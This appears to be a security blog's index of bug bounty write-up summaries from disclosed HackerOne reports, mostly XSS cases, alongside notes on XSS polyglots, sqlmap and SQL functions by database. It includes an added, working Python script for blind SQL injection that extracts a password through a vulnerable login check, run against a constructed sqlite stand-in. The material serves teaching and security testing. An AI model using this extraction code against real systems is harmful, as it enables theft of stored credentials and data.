Security

    Bug Bounty Write-up / Mass account takeovers [Slack]

    https://hackerone.com/reports/737140
    Slack disclosed on HackerOne: Mass account takeovers using HTTP... This researcher exploited an HTTP Request Smuggling bug on a Slack asset to perform a CL.TE-based hijack onto neighboring customer requests. This hijack forced the victim into an open-redirect that forwarded the victim onto the researcher's collaborator cl
    This bug hunter exploited HTTP Request S..

    Bug Bounty Write-up / Account retrieval [PayPal]

    https://hackerone.com/reports/739737
    PayPal disclosed on HackerOne: Token leak in security challenge... A bug was identified whereby sensitive, unique tokens were being leaked in a JS file used by the recaptcha implementation. In certain cases, a user must solve a CAPTCHA challenge after authenticating. When the security challenge is completed, the authentic
    This one earned a $15,300 bounty...

    Bug Bounty Write-up / RCE [Twitter]

    https://hackerone.com/reports/591295
    Twitter disclosed on HackerOne: Potential pre-auth RCE on Twitter VPN Hi, we (Orange Tsai and Meh Chang) are the security research team from DEVCORE. Recently, we have been doing research on SSL VPN security, and found several critical vulnerabilities in Pulse Secure SSL VPN! We have reported them to the vendor and [patches](https://kb
    This one earned a whopping $20,000 bounty..

    Bug Bounty Write-up / Stored XSS [Shopify]

    https://hackerone.com/reports/532643
    Shopify disclosed on HackerOne: Stored - XSS Hello Security Team, I have found a Stored XSS vulnerability. POC: Step 1: Go to https://app.oberlo.com/suppliers Step 2: Click on any product; you will be redirected to a URL like the example I have given, https://app.oberlo.com/suppliers/8/products/488813?referral
    Another XSS again today. I'll probably be writing only about XSS for a while. XSS bount..

    Bug Bounty Write-up / Stored XSS [AAF]

    https://hackerone.com/reports/411690
    Alliance of American Football disclosed on HackerOne: Stored xss... Dear Team, **Summary:** [add summary of the vulnerability] After looking into https://shop.aaf.com/Order/step1/index.cfm I found that the address field is vulnerable to stored XSS, which can lead to stealing any user's cookie and can lead to complet
    A bounty earned using Stored XSS..

    Bug Bounty Write-up / Stored XSS

    https://hackerone.com/reports/415484
    Shopify disclosed on HackerOne: Stored xss # Description: The WAF cuts HTML tags, but when put before tags we can bypass it :) . # Steps to reproduce: 1- Open your store account 2- Navigate to https://xxx.myshopify.com/admin/settings/general 3- Put your street address xss payload (xss">
    Another case today that earned a bounty with XSS. (I lost the draft, so I'm rewriting it.) Pulled off a Stored XSS and got a whopping 1000..

    Bug Bounty Write-up / Path Disclosure ($50)

    https://hackerone.com/reports/503804
    Unikrn disclosed on HackerOne: Path Disclosure Vulnerability... Hello, there is a path discovery on the server. https://crm.unikrn.com/plugins/MauticZapierBundle/MauticZapierBundle.php https://crm.unikrn.com/plugins/MauticCloudStorageBundle/MauticCloudStorageBundle.php and other scripts at https://crm.unikrn.com/plugin
    A very simple report. Even something like this gets a bounty..

    Bug Bounty Write-up / POST-based XSS ($500)

    https://hackerone.com/reports/429679
    Shopify disclosed on HackerOne: POST-based XSS on apps.shopify.com Hello Shopify team! I found a POST-based XSS which may be shared with other users and occurs in Firefox, IE, Edge. How to reproduce: 1. at partners.shopify.com go to apps -> choose one -> more actions -> create shopify app store listing 2. you will get redir
    Another XSS case today. XSS is ..

    XSS Polyglots (a powerful one-line XSS attack string)

    XSS Polyglots. When you think of XSS, there is one payload that comes to mind. In practice you rarely succeed with that payload alone: you end up writing attack code like "> that first closes the preceding markup, either by adding "> (the closing angle bracket) or by commenting the rest out with -->. When you do not know what kind of context the injection point sits in, that is, when you have to do blind XSS, you have to send many attack requests to the server and guess: try /, try ">, try ... and so on. There is, however, an attack string that does all of this in one shot, and it is called a polyglot. A single request is obviously better than many. First, the polyglot payload listed on the OWASP site ..

    Event handlers usable in XSS attacks

    https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
    XSS Filter Evasion Cheat Sheet - OWASP. Last revision (mm/dd/yy): 02/23/2019. Introduction: This article is focused on providing application security testing professionals with a guide to assist in Cross Site Scripting testing. The initial contents of this article were donated to OWASP by RSnake. FSCommand() (attacker can ..

    sqlmap: summary of all options and usage

    https://github.com/sqlmapproject/sqlmap/wiki/Usage
    sqlmapproject/sqlmap: Automatic SQL injection and database takeover tool

    Bug Bounty Write-up / DOM-based XSS ($500)

    https://hackerone.com/reports/474656
    HackerOne disclosed on HackerOne: Cross-site Scripting (XSS) on... Dear HackerOne team, **Summary:** I found DOM XSS at endpoint `https://www.hackerone.com/careers`, but can not bypass CSP. It works on IE and Edge. ### Steps To Reproduce - JS file is "Masonry js file", vulnerable code: //Checking for pot
    Again today, DOM-based XSS ..

    Bug Bounty Write-up / DOM-based XSS ($500)

    https://hackerone.com/reports/398054
    HackerOne disclosed on HackerOne: DOM Based XSS in... **Summary:** The Marketo contact form available on the www.hackerone.com website is affected by a cross-site scripting vulnerability, caused by an insecure 'message' event listener installed on the page. Whilst this could allow an attacker to execute JavaS
    The author triggered a DOM-based XSS and received $500 as the bount..

    Command reference by database (DB) type, part 2

    MS-SQL built-in functions
    SUBSTRING(string, start, length)
    LEN(string)
    ASCII(char)
    CHAR(number) - returns the character for an ASCII code
    STR(number)
    Comment syntax: --

    MySQL built-in functions
    SUBSTR(string, start, length)
    LENGTH(string): number of bytes
    CHAR_LENGTH(string): number of characters
    ASCII(string) - returns the ASCII value of the first character
    CHAR(n1, n2, ...) - returns the characters for the ASCII codes
    Comment syntax: # --

    MariaDB built-in functions
    SUBSTR(string, start, length)
    LENGTH(string): number of bytes
    CHAR_LENGTH(string): number of characters
    ASCII(string) - returns the A..
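    The functions in this reference are exactly the ones boolean-based blind SQL injection is built from: a length function to learn how long the secret is, SUBSTR/SUBSTRING to pick out one character, ASCII to turn it into a number that a single true/false question per request can binary-search, and a comment token to discard the rest of the query. The following is an added example and not code from the original post. It generates those payloads in both the MS-SQL spelling (SUBSTRING, LEN, ASCII) and the MySQL/MariaDB spelling (SUBSTR, CHAR_LENGTH, ASCII) and runs them against a constructed stand-in: an in-memory sqlite3 database with the function names it lacks registered through create_function, so the dialect-specific payloads execute verbatim. The table `users`, column `password`, the `admin` row and the `login_oracle` endpoint are made-up test fixtures. `--` is used as the comment in both dialects because it works in all three DBMSs listed above and in the stand-in; MySQL additionally accepts `#`.

```python
"""Boolean-based blind SQL injection driven by the per-DBMS functions from the
reference above. Added example, not from the original post: the target is an
in-memory sqlite3 stand-in (a constructed fixture) with the MySQL/MS-SQL
function names registered so the dialect payloads run unchanged."""
import sqlite3

# How each DBMS spells the three functions blind extraction needs, plus the
# comment token that throws away the remainder of the original query.
DIALECTS = {
    # MS-SQL: SUBSTRING / LEN / ASCII, comment with --
    "mssql": {"substr": "SUBSTRING", "length": "LEN", "ascii": "ASCII", "comment": "-- "},
    # MySQL / MariaDB: SUBSTR / CHAR_LENGTH (characters, not bytes) / ASCII.
    # MySQL also accepts '#' as a comment; '-- ' is used here since it is
    # valid in every dialect on the page and in the sqlite3 stand-in.
    "mysql": {"substr": "SUBSTR", "length": "CHAR_LENGTH", "ascii": "ASCII", "comment": "-- "},
}


def make_target():
    """Constructed vulnerable backend. sqlite3 has SUBSTR/LENGTH natively; the
    other names are registered here so MS-SQL and MySQL payloads parse as-is."""
    conn = sqlite3.connect(":memory:")
    conn.create_function("ASCII", 1, lambda s: ord(s[0]) if s else None)
    conn.create_function("LEN", 1, lambda s: None if s is None else len(s))
    conn.create_function("CHAR_LENGTH", 1, lambda s: None if s is None else len(s))
    conn.create_function("SUBSTRING", 3,
                         lambda s, i, n: None if s is None else s[i - 1:i - 1 + n])
    conn.execute("CREATE TABLE users (name TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'Tr0ub4dor&3')")  # constructed secret
    return conn


def login_oracle(conn, username):
    """The injectable endpoint (constructed). Builds SQL by string concatenation
    instead of binding a parameter, which is the bug. The attacker only sees
    whether a row matched (True) or not (False, including on SQL errors)."""
    sql = f"SELECT name FROM users WHERE name = '{username}'"
    try:
        return conn.execute(sql).fetchone() is not None
    except sqlite3.Error:
        return False


def ask(oracle, dialect, condition):
    """One yes/no question: close the literal, AND in the condition, comment out the rest."""
    d = DIALECTS[dialect]
    return oracle(f"admin' AND ({condition}) {d['comment']}")


def blind_extract(oracle, dialect, column, table, where, max_len=64):
    """Recover `column` of the row matching `where`, one character at a time.
    Step 1 finds the length with the dialect's length function; step 2 binary-
    searches each character's code in 0..127 via ASCII(SUBSTR(...)) > mid.
    Codes above 127 (non-ASCII data) would need a wider search range."""
    d = DIALECTS[dialect]
    target = f"(SELECT {column} FROM {table} WHERE {where})"

    length = next((n for n in range(0, max_len + 1)
                   if ask(oracle, dialect, f"{d['length']}({target}) = {n}")), None)
    if length is None:
        raise ValueError(f"secret longer than max_len={max_len} or query failed")

    out = []
    for pos in range(1, length + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            probe = f"{d['ascii']}({d['substr']}({target}, {pos}, 1)) > {mid}"
            if ask(oracle, dialect, probe):
                lo = mid + 1
            else:
                hi = mid
        out.append(chr(lo))
    return "".join(out)


if __name__ == "__main__":
    conn = make_target()
    oracle = lambda user: login_oracle(conn, user)
    for dialect in DIALECTS:
        secret = blind_extract(oracle, dialect, "password", "users", "name = 'admin'")
        print(f"{dialect}: {secret}")
```

    Swapping `DIALECTS` is the only change needed between the MS-SQL and MySQL/MariaDB payloads; everything else (the quote that closes the literal, the AND-ed condition, the trailing comment) is identical, which is why the per-DBMS function table above is worth keeping at hand. The byte-versus-character distinction between LENGTH and CHAR_LENGTH matters as soon as the secret contains multi-byte characters, since the length probe and the SUBSTR positions must count in the same unit.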

    Bug Bounty Write-up / Stored XSS ($750)

    https://hackerone.com/reports/484434
    Imgur disclosed on HackerOne: Stored XSS on imgur profile Hello, I submitted a report on imgur, but the staff marked it as duplicate. #482841 I reviewed the first submitted report. #381553 We are in the same situation and his case is already fixed, because I tried visiting his site too, which is https
    A case that earned a $650 bounty using Stored XSS..